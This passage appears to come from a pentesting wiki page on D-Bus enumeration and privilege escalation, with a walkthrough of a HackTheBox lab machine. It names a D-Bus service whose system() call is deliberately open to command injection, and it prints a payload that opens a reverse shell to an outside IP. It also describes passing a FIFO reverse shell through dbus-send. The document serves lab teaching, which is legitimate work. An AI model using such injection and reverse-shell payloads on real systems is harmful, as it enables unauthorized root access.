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**(This enumeration info was taken from** [**https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/**](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)**)**
Ubuntu desktop utilizes D-Bus as its inter-process communications (IPC) mediator. On Ubuntu, there are several message buses that run concurrently: A system bus, which is mainly used by **privileged services to expose system-wide relevant services**, and one session bus for each logged in user, which exposes services that are only relevant to that specific user. Since we will try to elevate our privileges, we will mainly focus on the system bus as the services there tend to run with higher privileges (i.e. root). Note that the D-Bus architecture utilizes one ‘router’ per session bus, which redirects client messages to the relevant services they are trying to interact with. Clients need to specify the address of the service to which they want to send messages.
Each service is defined by the **objects** and **interfaces** that it exposes. We can think of objects as instances of classes in standard OOP languages. Each unique instance is identified by its **object path**– a string which resembles a file system path that uniquely identifies each object that the service exposes. A standard interface that will help with our research is the **org.freedesktop.DBus.Introspectable** interface. It contains a single method, Introspect, which returns an XML representation of the methods, signals and properties supported by the object. This blog post focuses on methods and ignores properties and signals.
I used two tools to communicate with the D-Bus interface: CLI tool named **gdbus**, which allows to easily call D-Bus exposed methods in scripts, and [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), a Python based GUI tool that helps to enumerate the available services on each bus and to see which objects each service contains.
On the left pane in Figure 1 you can see all the various services that have registered with the D-Bus daemon system bus (note the select System Bus button on the top). I selected the **org.debin.apt** service, and D-Feet automatically **queried the service for all the available objects**. Once I selected a specific object, the set of all interfaces, with their respective methods properties and signals are listed, as seen in Figure 2. Note that we also get the signature of each **IPC exposed method**.
We can also see the **pid of the process** that hosts each service, as well as its **command line**. This is a very useful feature, since we can validate that the target service we are inspecting indeed runs with higher privileges. Some services on the System bus don’t run as root, and thus are less interesting to research.
D-Feet also allows one to call the various methods. In the method input screen we can specify a list of Python expressions, delimited by commas, to be interpreted as the parameters to the invoked function, shown in Figure 3. Python types are marshaled to D-Bus types and passed to the service.
Some methods require authentication before allowing us to invoke them. We will ignore these methods, since our goal is to elevate our privileges without credentials in the first place.
Also note that some of the services query another D-Bus service named org.freedeskto.PolicyKit1 whether a user should be allowed to perform certain actions or not.
When a process sets up a connection to a bus, the bus assigns to the connection a special bus name called _unique connection name_. Bus names of this type are immutable—it's guaranteed they won't change as long as the connection exists—and, more importantly, they can't be reused during the bus lifetime. This means that no other connection to that bus will ever have assigned such unique connection name, even if the same process closes down the connection to the bus and creates a new one. Unique connection names are easily recognizable because they start with the—otherwise forbidden—colon character.
Note the method `.Block` of the interface `htb.oouch.Block` (the one we are interested in). The "s" of the other columns may mean that it's expecting a string.
In order to **monitor** a **communication** you will need to be **root.** If you still find problems being root check [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) and [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
As user **qtc inside the host "oouch" from HTB** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
Note from the previous configuration that **you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication.
As user **qtc** inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py._ This is the interesting code:
In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.\
**The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
At the end of this page you can find the **complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the **_**D-Bus object path**_ **and **_**interface name**_** are registered**. This information will be necessary to send information to the D-Bus connection:
Also, in line 57 you can find that **the only method registered** for this D-Bus communication is called `Block`(_**Thats why in the following section the payloads are going to be sent to the service object `htb.oouch.Block`, the interface `/htb/oouch/Block` and the method name `Block`**_):
The following python code will send the payload to the D-Bus connection to the `Block` method via `block_iface.Block(runme)` (_note that it was extracted from the previous chunk of code_):
* Message Bus – A software used by systems to make communications between applications easily. It’s related to Message Queue (messages are ordered in sequence) but in Message Bus the messages are sending in a subscription model and also very quick.
* “-system” tag is used to mention that it is a system message, not a session message (by default).
* “–string:” – Type of message we like to send to the interface. There are several formats of sending messages like double, bytes, booleans, int, objpath. Out of this, the “object path” is useful when we want to send a path of a file to the Dbus interface. We can use a special file (FIFO) in this case to pass a command to interface in the name of a file. “string:;” – This is to call the object path again where we place of FIFO reverse shell file/command.
_Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._
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